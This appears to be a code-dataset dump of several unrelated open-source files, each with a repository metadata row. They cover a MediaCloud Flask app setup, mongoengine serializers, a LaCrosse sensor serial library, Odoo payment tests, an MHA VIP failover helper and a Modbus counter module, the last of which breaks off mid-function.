logging_config['handlers']['file']['filename'])
logging.config.dictConfig(logging_config)
logger = logging.getLogger(__name__)
logger.info("---------------------------------------------------------------------------")
flask_login_logger = logging.getLogger('flask_login')
flask_login_logger.setLevel(logging.DEBUG)
# load the config helper
config = get_default_config()
server_mode = config.get('SERVER_MODE').lower()
if server_mode not in [SERVER_MODE_DEV, SERVER_MODE_PROD]:
logger.error("Unknown server mode '{}', set a mode in the `config/app.config` file".format(server_mode))
sys.exit(1)
else:
logger.info("Started server in %s mode", server_mode)
# setup optional sentry logging service
try:
handler = SentryHandler(config.get('SENTRY_DSN'))
handler.setLevel(logging.ERROR)
setup_logging(handler)
except ConfigException as e:
logger.info("no sentry logging")
# Connect to MediaCloud
TOOL_API_KEY = config.get('MEDIA_CLOUD_API_KEY')
mc = mediacloud.api.AdminMediaCloud(TOOL_API_KEY)
logger.info("Connected to mediacloud")
# Connect to CLIFF if the settings are there
cliff = None
try:
cliff = Cliff(config.get('CLIFF_URL'))
except KeyError as e:
logger.warning("no CLIFF connection")
NYT_THEME_LABELLER_URL = config.get('NYT_THEME_LABELLER_URL')
# Connect to the app's mongo DB
try:
user_db = UserDatabase(config.get('MONGO_URL'))
analytics_db = AnalyticsDatabase(config.get('MONGO_URL'))
user_db.check_connection()
logger.info("Connected to DB: {}".format(config.get('MONGO_URL')))
except Exception as err:
logger.error("DB error: {0}".format(err))
logger.exception(err)
sys.exit()
def is_dev_mode():
return server_mode == SERVER_MODE_DEV
def is_prod_mode():
return server_mode == SERVER_MODE_PROD
webpack = Webpack()
mail = Mail()
def create_app():
# Factory method to create the app
prod_app_name = config.get('SERVER_APP')
my_app = Flask(__name__)
# set up uploading
my_app.config['MAX_CONTENT_LENGTH'] = 1 * 1024 * 1024 # 1MB
my_app.config['UPLOAD_FOLDER'] = tempfile.gettempdir()
# Set up sentry logging
my_app.config['SENTRY_USER_ATTRS'] = ['email']
try:
sentry_dsn = config.get('SENTRY_DSN')
Sentry(my_app, dsn=sentry_dsn)
except ConfigException as ce:
logger.warning(ce)
# set up webpack
if is_dev_mode():
manifest_path = '../build/manifest.json'
else:
manifest_path = '../server/static/gen/{}/manifest.json'.format(prod_app_name)
webpack_config = {
'DEBUG': is_dev_mode(),
'WEBPACK_MANIFEST_PATH': manifest_path
}
# caching and CDN config
my_app.config['SEND_FILE_MAX_AGE_DEFAULT'] = 7 * 24 * 60 * 60
try:
cdn_asset_url = config.get('ASSET_URL')
webpack_config['WEBPACK_ASSETS_URL'] = cdn_asset_url
logger.info("Asset pipeline: {}".format(cdn_asset_url))
except ConfigException:
logger.info("Asset pipeline: no cdn")
my_app.config.update(webpack_config)
webpack.init_app(my_app)
# set up mail sending
try:
if config.get('SMTP_ENABLED') == '1':
mail_config = { # @see https://pythonhosted.org/Flask-Mail/
'MAIL_SERVER': config.get('SMTP_SERVER'),
'MAIL_PORT': int(config.get('SMTP_PORT')),
'MAIL_USE_SSL': config.get('SMTP_USE_SSL'),
'MAIL_USERNAME': config.get('SMTP_USER'),
'MAIL_PASSWORD': config.get('SMTP_PASS'),
}
my_app.config.update(mail_config)
mail.init_app(my_app)
logger.info('Mailing from {} via {}'.format(config.get('SMTP_USER'), config.get('SMTP_SERVER')))
# need to tell jinja to look in "emails" directory directly for the shared email templates
# because the `imports` in them don't include relative paths
my_loader = jinja2.ChoiceLoader([
my_app.jinja_loader,
jinja2.FileSystemLoader([os.path.join(base_dir, 'server', 'templates'),
os.path.join(base_dir, 'server', 'templates', 'emails')])
])
my_app.jinja_loader = my_loader
else:
logger.warning("Mail configured, but not enabled")
except ConfigException as ce:
logger.exception(ce)
logger.warning("No mail configured")
# set up thread pooling
my_app.config['EXECUTOR_PROPAGATE_EXCEPTIONS'] = True
my_app.config['EXECUTOR_MAX_WORKERS'] = 20
# app.config['EXECUTOR_TYPE'] = 'thread' # valid options - 'thread' (default) or 'process'
# set up user login
cookie_domain = config.get('COOKIE_DOMAIN')
my_app.config['SESSION_COOKIE_NAME'] = "mc_session"
my_app.config['REMEMBER_COOKIE_NAME'] = "mc_remember_token"
if cookie_domain != 'localhost': # can't set cookie domain on localhost
my_app.config['SESSION_COOKIE_DOMAIN'] = cookie_domain
my_app.config['REMEMBER_COOKIE_DOMAIN'] = cookie_domain
# connect to the shared session storage
my_app.session_interface = RedisSessionInterface(redis.StrictRedis.from_url(config.get('SESSION_REDIS_URL')))
my_app.cli.add_command(sync_frontend_db)
return my_app
server_app = config.get('SERVER_APP')
app = create_app()
app.secret_key = config.get('SECRET_KEY')
# Create user login manager
login_manager = flask_login.LoginManager()
login_manager.init_app(app)
# connect executor pool to app, so it loads context for us automatically on each parallel process :-)
# using one shared executor pool for now - can revisit later if we need to
executor = Executor(app)
# set up all the views
@app.route('/')
def index():
logger.debug("homepage request")
try:
maintenance_mode = config.get('MAINTENANCE_MODE')
except ConfigException:
maintenance_mode = 0
return render_template('index.html',
cookie_domain=config.get('COOKIE_DOMAIN'),
maintenance_mode=maintenance_mode)
# now load in the appropriate view endpoints, after the app has been initialized
import server.views.user
import server.views.app
import server.views.admin.users
import server.views.admin.analytics
import server.views.download
import server.views.stories
import server.views.media_search
import server.views.media_picker
import server.views.sources.search
import server.views.metadata
import server.views.platforms
if (server_app == SERVER_APP_SOURCES) or is_dev_mode():
import server.views.sources.collection
import server.views.sources.collectionedit
import server.views.sources.source
import server.views.sources.feeds
import server.views.sources.suggestions
import server.views.sources.words
import server.views.sources.geocount
if (server_app == SERVER_APP_TOPICS) or is_dev_mode():
import server.views.topics.media
import server.views.topics.story
import server.views.topics.stories
import server.views.topics.topic
import server.views.topics.topiclist
import server.views.topics.topiccreate
import server.views.topics.topicsnapshot
import server.views.topics.words
import server.views.topics.platforms.platforms_manage
import server.views.topics.platforms.platforms_generic_csv
import server.views.topics.foci.focalsets
import server.views.topics.foci.focaldefs
import server.views.topics.foci.retweetpartisanship
import server.views.topics.foci.topcountries
import server.views.topics.foci.nyttheme
import server.views.topics.foci.mediatype
import server.views.topics.permissions
import server.views.topics.files
import server.views.topics.provider
if (server_app == SERVER_APP_EXPLORER) or is_dev_mode():
import server.views.explorer.explorer_query
import server.views.explorer.sentences
import server.views.explorer.words
import server.views.explorer.story_samples
import server.views.explorer.story_counts
import server.views.explorer.geo
import server.views.explorer.tags
import server.views.explorer.saved_searches
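# --- Illustrative usage (an added sketch, not part of the original module) ---
# The module builds `app` at import time, so a local development server can be
# started directly; the host and port below are assumptions.
if __name__ == '__main__':
    app.run(host='127.0.0.1', port=5000, debug=is_dev_mode())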
|
apache-2.0
| 5,585,641,705,978,839,000 | 35.615686 | 113 | 0.682339 | false |
ideanotion/infoneigeapi
|
api/serializers.py
|
1
|
3425
|
from __future__ import unicode_literals
from api.models import *
from rest_framework_mongoengine.serializers import MongoEngineModelSerializer
import warnings
from django.core.exceptions import ValidationError
from mongoengine.errors import ValidationError
from rest_framework import serializers
from rest_framework import fields
import mongoengine
from mongoengine.base import BaseDocument
from django.core.paginator import Page
from django.db import models
from django.forms import widgets
from django.utils.datastructures import SortedDict
from rest_framework.compat import get_concrete_model
from rest_framework_mongoengine.fields import ReferenceField, ListField, EmbeddedDocumentField, DynamicField
#override get_field to include LineStringField in the mapping
class MongoEngineModelSerializer2(MongoEngineModelSerializer):
def get_field(self, model_field):
kwargs = {}
if model_field.__class__ in (mongoengine.ReferenceField, mongoengine.EmbeddedDocumentField, mongoengine.ListField, mongoengine.DynamicField):
kwargs['model_field'] = model_field
kwargs['depth'] = self.opts.depth
if not model_field.__class__ == mongoengine.ObjectIdField:
kwargs['required'] = model_field.required
if model_field.__class__ == mongoengine.EmbeddedDocumentField:
kwargs['document_type'] = model_field.document_type
if model_field.default:
kwargs['required'] = False
kwargs['default'] = model_field.default
if model_field.__class__ == models.TextField:
kwargs['widget'] = widgets.Textarea
field_mapping = {
mongoengine.FloatField: fields.FloatField,
mongoengine.IntField: fields.IntegerField,
mongoengine.DateTimeField: fields.DateTimeField,
mongoengine.EmailField: fields.EmailField,
mongoengine.URLField: fields.URLField,
mongoengine.StringField: fields.CharField,
mongoengine.BooleanField: fields.BooleanField,
mongoengine.FileField: fields.FileField,
mongoengine.ImageField: fields.ImageField,
mongoengine.ObjectIdField: fields.Field,
mongoengine.ReferenceField: ReferenceField,
mongoengine.ListField: ListField,
mongoengine.EmbeddedDocumentField: EmbeddedDocumentField,
mongoengine.DynamicField: DynamicField,
mongoengine.DecimalField: fields.DecimalField,
mongoengine.LineStringField: fields.CharField,
}
attribute_dict = {
mongoengine.StringField: ['max_length'],
mongoengine.DecimalField: ['min_value', 'max_value'],
mongoengine.EmailField: ['max_length'],
mongoengine.FileField: ['max_length'],
mongoengine.ImageField: ['max_length'],
mongoengine.URLField: ['max_length'],
}
if model_field.__class__ in attribute_dict:
attributes = attribute_dict[model_field.__class__]
for attribute in attributes:
kwargs.update({attribute: getattr(model_field, attribute)})
try:
return field_mapping[model_field.__class__](**kwargs)
except KeyError:
return fields.ModelField(model_field=model_field, **kwargs)
class StreetSerializer(MongoEngineModelSerializer2):
class Meta:
model = Street
depth = 8
class CoteSerializer(MongoEngineModelSerializer2):
class Meta:
model = Cote
exclude = ()
depth = 8
class CotePlanSerializer(MongoEngineModelSerializer2):
class Meta:
model = Cote
exclude = ('id','street','geometry','properties',)
depth = 1
class CoteGeoSerializer(MongoEngineModelSerializer2):
class Meta:
model = Cote
exclude = ('id','street','plan','properties',)
depth = 1
|
gpl-2.0
| -2,298,330,859,549,157,400 | 34.319588 | 143 | 0.770511 | false |
hthiery/python-lacrosse
|
pylacrosse/lacrosse.py
|
1
|
8422
|
# Copyright (c) 2017 Heiko Thiery
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301
# USA
from __future__ import unicode_literals
import logging
import re
import threading
_LOGGER = logging.getLogger(__name__)
"""
Jeelink lacrosse firmware commands
<n>a set to 0 if the blue LED bothers
<n>f initial frequency in kHz (5 kHz steps, 860480 ... 879515) (for RFM
#1)
<n>F initial frequency in kHz (5 kHz steps, 860480 ... 879515) (for RFM
#2)
<n>h altitude above sea level
<n>m bits 1: 17.241 kbps, 2 : 9.579 kbps, 4 : 8.842 kbps (for RFM #1)
<n>M bits 1: 17.241 kbps, 2 : 9.579 kbps, 4 : 8.842 kbps (for RFM #2)
<n>r use one of the possible data rates (for RFM #1)
<n>R use one of the possible data rates (for RFM #2)
<n>t 0=no toggle, else interval in seconds (for RFM #1)
<n>T 0=no toggle, else interval in seconds (for RFM #2)
v show version
<n>y if 1 all received packets will be retransmitted (Relay mode)
"""
class LaCrosse(object):
sensors = {}
_registry = {}
_callback = None
_serial = None
_stopevent = None
_thread = None
def __init__(self, port, baud, timeout=2):
"""Initialize the Lacrosse device."""
self._port = port
self._baud = baud
self._timeout = timeout
self._serial = SerialPortFactory().create_serial_port(port)
self._callback_data = None
def open(self):
"""Open the device."""
self._serial.port = self._port
self._serial.baudrate = self._baud
self._serial.timeout = self._timeout
self._serial.open()
self._serial.flushInput()
self._serial.flushOutput()
def close(self):
"""Close the device."""
self._stop_worker()
self._serial.close()
def start_scan(self):
"""Start scan task in background."""
self._start_worker()
def _write_cmd(self, cmd):
"""Write a cmd."""
self._serial.write(cmd.encode())
@staticmethod
def _parse_info(line):
"""
The output can be:
- [LaCrosseITPlusReader.10.1s (RFM12B f:0 r:17241)]
- [LaCrosseITPlusReader.10.1s (RFM12B f:0 t:10~3)]
"""
re_info = re.compile(
r'\[(?P<name>\w+).(?P<ver>.*) ' +
r'\((?P<rfm1name>\w+) (\w+):(?P<rfm1freq>\d+) ' +
r'(?P<rfm1mode>.*)\)\]')
info = {
'name': None,
'version': None,
'rfm1name': None,
'rfm1frequency': None,
'rfm1datarate': None,
'rfm1toggleinterval': None,
'rfm1togglemask': None,
}
match = re_info.match(line)
if match:
info['name'] = match.group('name')
info['version'] = match.group('ver')
info['rfm1name'] = match.group('rfm1name')
info['rfm1frequency'] = match.group('rfm1freq')
values = match.group('rfm1mode').split(':')
if values[0] == 'r':
info['rfm1datarate'] = values[1]
elif values[0] == 't':
toggle = values[1].split('~')
info['rfm1toggleinterval'] = toggle[0]
info['rfm1togglemask'] = toggle[1]
return info
def get_info(self):
"""Get current configuration info from 'v' command."""
re_info = re.compile(r'\[.*\]')
self._write_cmd('v')
while True:
line = self._serial.readline()
try:
line = line.encode().decode('utf-8')
except AttributeError:
line = line.decode('utf-8')
match = re_info.match(line)
if match:
return self._parse_info(line)
def led_mode_state(self, state):
"""Set the LED mode.
The LED state can be True or False.
"""
self._write_cmd('{}a'.format(int(state)))
def set_frequency(self, frequency, rfm=1):
"""Set frequency in kHz.
The frequency can be set in 5kHz steps.
"""
cmds = {1: 'f', 2: 'F'}
self._write_cmd('{}{}'.format(frequency, cmds[rfm]))
def set_datarate(self, rate, rfm=1):
"""Set datarate (baudrate)."""
cmds = {1: 'r', 2: 'R'}
self._write_cmd('{}{}'.format(rate, cmds[rfm]))
def set_toggle_interval(self, interval, rfm=1):
"""Set the toggle interval."""
cmds = {1: 't', 2: 'T'}
self._write_cmd('{}{}'.format(interval, cmds[rfm]))
def set_toggle_mask(self, mode_mask, rfm=1):
"""Set toggle baudrate mask.
The baudrate mask values are:
1: 17.241 kbps
2 : 9.579 kbps
4 : 8.842 kbps
These values can be or'ed.
"""
cmds = {1: 'm', 2: 'M'}
self._write_cmd('{}{}'.format(mode_mask, cmds[rfm]))
def _start_worker(self):
if self._thread is not None:
return
self._stopevent = threading.Event()
self._thread = threading.Thread(target=self._refresh, args=())
self._thread.daemon = True
self._thread.start()
def _stop_worker(self):
if self._stopevent is not None:
self._stopevent.set()
if self._thread is not None:
self._thread.join()
def _refresh(self):
"""Background refreshing thread."""
while not self._stopevent.isSet():
line = self._serial.readline()
#this is for python2/python3 compatibility. Is there a better way?
try:
line = line.encode().decode('utf-8')
except AttributeError:
line = line.decode('utf-8')
if LaCrosseSensor.re_reading.match(line):
sensor = LaCrosseSensor(line)
self.sensors[sensor.sensorid] = sensor
if self._callback:
self._callback(sensor, self._callback_data)
if sensor.sensorid in self._registry:
for cbs in self._registry[sensor.sensorid]:
cbs[0](sensor, cbs[1])
def register_callback(self, sensorid, callback, user_data=None):
"""Register a callback for the specified sensor id."""
if sensorid not in self._registry:
self._registry[sensorid] = list()
self._registry[sensorid].append((callback, user_data))
def register_all(self, callback, user_data=None):
"""Register a callback for all sensors."""
self._callback = callback
self._callback_data = user_data
class LaCrosseSensor(object):
"""The LaCrosse Sensor class."""
# OK 9 248 1 4 150 106
re_reading = re.compile(r'OK (\d+) (\d+) (\d+) (\d+) (\d+) (\d+)')
def __init__(self, line=None):
if line:
self._parse(line)
def _parse(self, line):
match = self.re_reading.match(line)
if match:
data = [int(c) for c in match.group().split()[1:]]
self.sensorid = data[1]
self.sensortype = data[2] & 0x7f
self.new_battery = True if data[2] & 0x80 else False
self.temperature = float(data[3] * 256 + data[4] - 1000) / 10
self.humidity = data[5] & 0x7f
self.low_battery = True if data[5] & 0x80 else False
def __repr__(self):
return "id=%d t=%f h=%d nbat=%d" % \
(self.sensorid, self.temperature, self.humidity, self.new_battery)
class SerialPortFactory(object):
def create_serial_port(self, port):
if port.startswith("rfc2217://"):
from serial.rfc2217 import Serial
return Serial()
else:
from serial import Serial
return Serial()
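# --- Illustrative usage (an added sketch, not part of the original module) ---
# Opens a Jeelink on an assumed port, prints every decoded sensor frame from
# the background reader thread, and stops cleanly on Ctrl-C.
if __name__ == '__main__':
    import time

    def print_sensor(sensor, user_data):
        print(sensor)  # e.g. "id=9 t=21.500000 h=45 nbat=0"

    lacrosse = LaCrosse('/dev/ttyUSB0', 57600)
    lacrosse.open()
    lacrosse.register_all(print_sensor)
    lacrosse.start_scan()
    try:
        while True:
            time.sleep(1)
    except KeyboardInterrupt:
        lacrosse.close()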
|
lgpl-2.1
| 5,584,597,985,003,810,000 | 32.420635 | 80 | 0.553906 | false |
open-synergy/opnsynid-account-payment
|
account_payment_import_no_move_line/tests/base.py
|
1
|
2437
|
# -*- coding: utf-8 -*-
# Copyright 2017 OpenSynergy Indonesia
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl).
from openerp.tests.common import TransactionCase
from datetime import datetime
class BaseTest(TransactionCase):
def setUp(self, *args, **kwargs):
super(BaseTest, self).setUp(*args, **kwargs)
# Objects
self.obj_account_invoice = self.env['account.invoice']
self.obj_account_invoice_line = self.env['account.invoice.line']
self.obj_bank_statement = self.env['account.bank.statement']
self.obj_payment_order = self.env['payment.order']
self.obj_payment_line = self.env['payment.line']
self.obj_payment_mode = self.env['payment.mode']
self.wiz = self.env['account.payment.populate.statement']
self.obj_create_payment = self.env['payment.order.create']
# Data
self.date = datetime.now().strftime("%Y-%m-%d")
self.partner = self.env.ref("base.res_partner_1")
self.product = self.env.ref('product.product_product_5')
self.mode = self.env.ref('account_payment.payment_mode_1')
self.curr = self.env.ref("base.IDR")
self.account = self.env.ref('account.a_recv')
self.journal = self.env.ref('account.bank_journal')
self.invoice = self._create_invoice()
self.payment_order = self._create_payment_order()
self.data_payment = self.env.ref('account_payment.payment_order_1')
def _create_invoice(self):
vals = {
'partner_id': self.partner.id,
'reference_type': 'none',
'currency_id': self.curr.id,
'name': 'invoice to client',
'account_id': self.account.id,
'type': 'out_invoice',
'date_invoice': self.date,
'date_due': self.date
}
invoice_id = self.obj_account_invoice.create(vals)
lines = {
'product_id': self.product.id,
'quantity': 1,
'price_unit': 50000,
'invoice_id': invoice_id.id,
'name': 'Test Invoice'
}
self.obj_account_invoice_line.create(lines)
return invoice_id
def _create_payment_order(self):
vals = {
'reference': 'Test Payment',
'mode': self.mode.id,
'date_prefered': 'now'
}
order_id = self.obj_payment_order.create(vals)
return order_id
|
agpl-3.0
| 2,740,612,655,803,864,600 | 35.924242 | 75 | 0.587608 | false |
grypyrg/mha-helper
|
mha_helper/vip_metal_helper.py
|
1
|
4494
|
# (c) 2015, Ovais Tariq <me@ovaistariq.net>
#
# This file is part of mha_helper
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from __future__ import print_function
from ssh_helper import SSHHelper
from config_helper import ConfigHelper
import re
class VIPMetalHelper(object):
IP_CMD = "/sbin/ip"
ARPING_CMD = "/usr/sbin/arping"
def __init__(self, host, host_ip=None, ssh_user=None, ssh_port=None, ssh_options=None):
config_helper = ConfigHelper(host)
self._cluster_interface = config_helper.get_cluster_interface()
self._writer_vip_cidr = config_helper.get_writer_vip_cidr()
self._writer_vip = config_helper.get_writer_vip()
self._requires_sudo = config_helper.get_requires_sudo()
self._requires_arping = config_helper.get_requires_arping()
self._ssh_client = SSHHelper(host, host_ip, ssh_user, ssh_port, ssh_options)
def assign_vip(self):
ip_cmd = "%s addr add %s dev %s" % (VIPMetalHelper.IP_CMD, self._writer_vip_cidr, self._cluster_interface)
arping_cmd = "%s -q -c 3 -A -I %s %s" % (VIPMetalHelper.ARPING_CMD, self._cluster_interface, self._writer_vip)
if self._requires_sudo:
ip_cmd = "sudo %s" % ip_cmd
arping_cmd = "sudo %s" % arping_cmd
# Connect to the host over SSH
if not self._ssh_client.make_ssh_connection():
return False
# Assign the VIP to the host
ret_code, stdout_lines = self._ssh_client.execute_ssh_command(ip_cmd)
if not ret_code:
if len(stdout_lines) > 0:
print("Command output: %s" % "\n".join(stdout_lines))
return False
# Send ARP update requests to all the listening hosts
if self._requires_arping:
ret_code, stdout_lines = self._ssh_client.execute_ssh_command(arping_cmd)
if not ret_code:
if len(stdout_lines) > 0:
print("Command output: %s" % "\n".join(stdout_lines))
return False
return True
def remove_vip(self):
ip_cmd = "%s addr delete %s dev %s" % (VIPMetalHelper.IP_CMD, self._writer_vip_cidr, self._cluster_interface)
if self._requires_sudo:
ip_cmd = "sudo %s" % ip_cmd
# Connect to the host over SSH
if not self._ssh_client.make_ssh_connection():
return False
# Remove the VIP from the host
ret_code, stdout_lines = self._ssh_client.execute_ssh_command(ip_cmd)
if not ret_code:
if len(stdout_lines) > 0:
print("Command output: %s" % "\n".join(stdout_lines))
return False
return True
def has_vip(self):
ip_cmd = "%s addr show dev %s" % (VIPMetalHelper.IP_CMD, self._cluster_interface)
if self._requires_sudo:
ip_cmd = "sudo %s" % ip_cmd
# Connect to the host over SSH
if not self._ssh_client.make_ssh_connection():
return False
# Fetch the output of the command `ip addr show dev eth` and parse it to list the IP addresses
# If the VIP is in that list then that means the VIP is assigned to the host
ret_code, stdout_lines = self._ssh_client.execute_ssh_command(ip_cmd)
if not ret_code:
if len(stdout_lines) > 0:
print("Command output: %s" % "\n".join(stdout_lines))
return False
vip_found = False
for line in stdout_lines:
# We want to match a line similar to the following:
# inet 192.168.30.11/24 brd 192.168.30.255 scope global eth1
if re.search(r'\b(inet|inet6)\b', line):
# The second element of the matching line is the IP address in CIDR format
if line.split()[1] == self._writer_vip_cidr:
vip_found = True
break
return vip_found
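# --- Illustrative usage (an added sketch, not part of the original module) ---
# Moves the writer VIP from a demoted master to the new one; the host names
# and SSH user are assumptions (in practice MHA failover hooks drive this).
if __name__ == '__main__':
    old_master = VIPMetalHelper('db1', ssh_user='mha')
    new_master = VIPMetalHelper('db2', ssh_user='mha')
    if old_master.has_vip():
        old_master.remove_vip()
    if not new_master.has_vip():
        new_master.assign_vip()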
|
gpl-3.0
| -1,085,869,760,472,651,600 | 39.125 | 118 | 0.613262 | false |
dcneeme/droidcontroller
|
cchannels.py
|
1
|
20840
|
# to be imported to access modbus registers as counters
# 04.04.2014 OOP
# 05.04.2014 OOP
# 06.04.2014 counter groups with sequential regadd range, optimized read done
# 15.04.2014 added ask_counters()
from sqlgeneral import * # SQLgeneral / also pulls in time, mb, conn etc.
s=SQLgeneral() # move into __init__?
from counter2power import * # Counter2Power() handles power calculation based on pulse count increments
class Cchannels(SQLgeneral): # handles counters registers and tables
''' Access to io by modbus analogue register addresses (and also via services?).
Modbus client must be opened before.
Able to sync input and output channels and accept changes to service members by their sta_reg code
'''
def __init__(self, in_sql = 'counters.sql', readperiod = 10, sendperiod = 30):
self.setReadPeriod(readperiod)
self.setSendPeriod(sendperiod)
self.in_sql = in_sql.split('.')[0]
self.s = SQLgeneral()
self.cp=[] # possible counter2value calculation instances
self.Initialize()
def setReadPeriod(self, invar):
''' Set the refresh period, executes sync if time from last read was earlier than period ago '''
self.readperiod = invar
def setSendPeriod(self, invar):
''' Set the refresh period, executes sync if time from last read was earlier than period ago '''
self.sendperiod = invar
def sqlread(self, table):
self.s.sqlread(table) # read dichannels
def Initialize(self): # before using this create s=SQLgeneral()
''' initialize delta t variables, create tables and modbus connection '''
self.ts = round(time.time(),1)
self.ts_read = self.ts # time of last read
self.ts_send = self.ts -10 # time of last reporting
self.sqlread(self.in_sql) # read counters table
self.ask_counters() # ask server about the last known values of the counter related services
def ask_counters(self): # use on init, send ? to server
''' Queries last counter service values from the server '''
Cmd="select val_reg from "+self.in_sql+" group by val_reg" # process and report by services
#print "Cmd=",Cmd
cur=conn.cursor()
cur.execute(Cmd) # getting services to be read and reported
for row in cur: # possibly multivalue service members
val_reg=row[0]
            udp.udpsend(val_reg+':?\n') # query without status, sent to the uniscada server
conn.commit()
return 0
def restore_counter(self,register): # one at the time
''' decode values from server for set_counter(). some values are counted, but some may be setup values! '''
#FIXME!
return 0
def set_counter(self, value = 0, **kwargs): # mba,regadd,val_reg,member # one counter to be set. check wcount from counters table
''' sets ONE counter value, any wordlen (number of registers,must be defined in counters.sql) '''
#val_reg='' # arguments to use a subset of them
#member=0
#mba=0
#regadd=0
#wcount=0
value=(int(value)&0xFFFFFFFF) # to make sure the value to write is 32 bit integer
        cur=conn.cursor()
        mbi=int(kwargs.get('mbi', 0)) # modbus connection index, defaults to the first connection
        try:
            mba=kwargs['mba']
            regadd=kwargs['regadd']
            Cmd="select val_reg,member,mba,regadd,wcount,x2,y2 from counters where mba='"+str(mba)+"' and regadd='"+str(regadd)+"' and mbi="+str(mbi)
#print(Cmd) # debug
        except KeyError: # fall back to addressing the counter by service name and member
            val_reg=kwargs.get('val_reg','C1V')
            member=kwargs.get('member',1)
            Cmd="select val_reg,member,mba,regadd,wcount,x2,y2 from counters where val_reg='"+val_reg+"' and member='"+str(member)+"' and mbi="+str(mbi)
try:
cur.execute(Cmd)
for srow in cur:
val_reg=srow[0]
member=int(srow[1]) # replaces if missing
mba=int(srow[2]) # replaces if missing
regadd=int(srow[3])
wcount=int(srow[4])
# x2 y2 for autoscale (5,6)
                if wcount == 2: # normal counter, MSW stored at the lower address
                    mb[mbi].write(mba,regadd,count=2, values=[(value>>16)&0xFFFF, value&0xFFFF])
                    return 0
                else:
                    if wcount == -2: # barionet counter, swapped word order (LSW at the lower address)
                        mb[mbi].write(mba,address=regadd, count=2,values=[value&0xFFFF, (value>>16)&0xFFFF])
                        return 0
                    else:
                        print('unsupported counter configuration!',mba,regadd,wcount)
                        return 1
except: # set failed
msg='failed restoring counter register '+str(mba)+'.'+str(regadd)
#syslog(msg)
print(msg)
traceback.print_exc()
return 1
def read_counter_grp(self,mba,regadd,count,wcount,mbi=0): # using self,in_sql as the table to store in.
''' Read sequential register group, process numbers according to counter size and store raw into table self.in_sql. Inside transaction! '''
step=abs(wcount)
if step == 0:
print('illegal wcount',wcount,'in read_counter_grp()')
return 2
msg='reading data for counter group from mba '+str(mba)+', regadd '+str(regadd)+', count '+str(count)+', wcount '+str(wcount)+', mbi '+str(mbi)
#print(msg) # debug
        if count>0 and mba != 0 and wcount != 0:
result = mb[mbi].read(mba, regadd, count=count, type='h') # client.read_holding_registers(address=regadd, count=1, unit=mba)
msg=msg+', result: '+str(result)
print(msg) # debug
else:
print('invalid parameters for read_counter_grp()!',mba,regadd,count,wcount,mbi)
return 2
if result != None:
try:
for i in range(count/step): # tuple to table rows. tuple len is twice count!
tcpdata=0
if wcount == 2:
tcpdata = 65536*result[step*i]+result[step*i+1]
#print('normal counter',str(i),'result',tcpdata) # debug
elif wcount == -2:
tcpdata = 65536*result[step*i+1]+result[step*i] # wrong word order for counters in barionet!
#print('barionet counter',str(i),'result',tcpdata) # debug
else: # something else
print('unsupported counter word size',wcount)
return 1
Cmd="UPDATE "+self.in_sql+" set raw='"+str(tcpdata)+"', ts='"+str(self.ts)+"' where mba='"+str(mba)+"' and regadd='"+str(regadd+i*step)+"'" # koigile korraga
#print('i',i,Cmd) # debug
conn.execute(Cmd)
return 0
except:
traceback.print_exc()
return 1
else:
msg='counter data processing FAILED for mbi,mba,regadd,count '+str(mbi)+', '+str(mba)+', '+str(regadd)+', '+str(count)
print(msg)
return 1
def read_counters(self): # read all defined counters, usually 32 bit / 2 registers.
        ''' Must read the counter registers by sequential regadd blocks if possible (if regadd increment == wcount).
            Also converts the raw data (incl member rows without mba) into services and sends them away to UDPchannel.
        '''
respcode=0
mba=0
val_reg=''
sta_reg=''
status=0
value=0
lisa=''
desc=''
comment=''
#mcount=0
Cmd1=''
self.ts = round(time.time(),1)
        ts_created=self.ts # used as the timestamp of the service
cur=conn.cursor()
cur3=conn.cursor()
bmba=0 # mba for sequential register address block
bfirst=0 # sequential register block start
blast=0
wcount=0
bwcount=0
bcount=0
tcpdata=0
sent=0
try:
Cmd="BEGIN IMMEDIATE TRANSACTION" # conn3
conn.execute(Cmd)
Cmd="select mba,regadd,wcount,mbi from "+self.in_sql+" where mba<>'' and regadd<>'' group by mbi,mba,regadd" # tsykkel lugemiseks, tuleks regadd kasvavasse jrk grupeerida
            cur.execute(Cmd) # raw values are updated based on this query; value calculations are done later for each service member separately
for row in cur: # these groups can be interrupted into pieces to be queried!
                mba=int(row[0]) if row[0] != '' else 0
                regadd=int(row[1]) if row[1] != '' else 0
                wcount=int(row[2]) if row[2] != '' else 0 # wordcount for the whole group
                mbi=int(row[3]) if row[3] != '' else 0 # modbus connection index
#print 'found counter mbi,mba,regadd,wcount',mbi,mba,regadd,wcount # debug
if bfirst == 0:
bfirst = regadd
blast = regadd
bwcount = wcount # wcount can change with next group
bcount=abs(wcount) # word count is the count
bmba=mba
bmbi=mbi
#print('counter group mba '+str(bmba)+' start ',bfirst) # debug
else: # not the first
if mbi == bmbi and mba == bmba and regadd == blast+abs(wcount): # sequential group still growing
blast = regadd
bcount=bcount+abs(wcount) # increment by word size
#print('counter group end shifted to',blast) # debug
else: # a new group started, make a query for previous
                    #print('counter group end detected at regadd',blast,'bcount',bcount) # debug
#print('going to read counter registers from',bmba,bfirst,'to',blast,'regcount',bcount) # debug
self.read_counter_grp(bmba,bfirst,bcount,bwcount,bmbi) # reads and updates table with previous data
bfirst = regadd # new grp starts immediately
blast = regadd
#bwcount = wcount # does not change inside group
bcount=abs(wcount) # new read piece started
bwcount=wcount
bmba=mba
bmbi=mbi
#print('counter group mba '+str(bmba)+' start ',bfirst) # debug
if bfirst != 0: # last group yet unread
#print('counter group end detected at regadd',blast) # debug
#print('going to read counter registers from',bmba,bfirst,'to',blast,'regcount',bcount) # debug
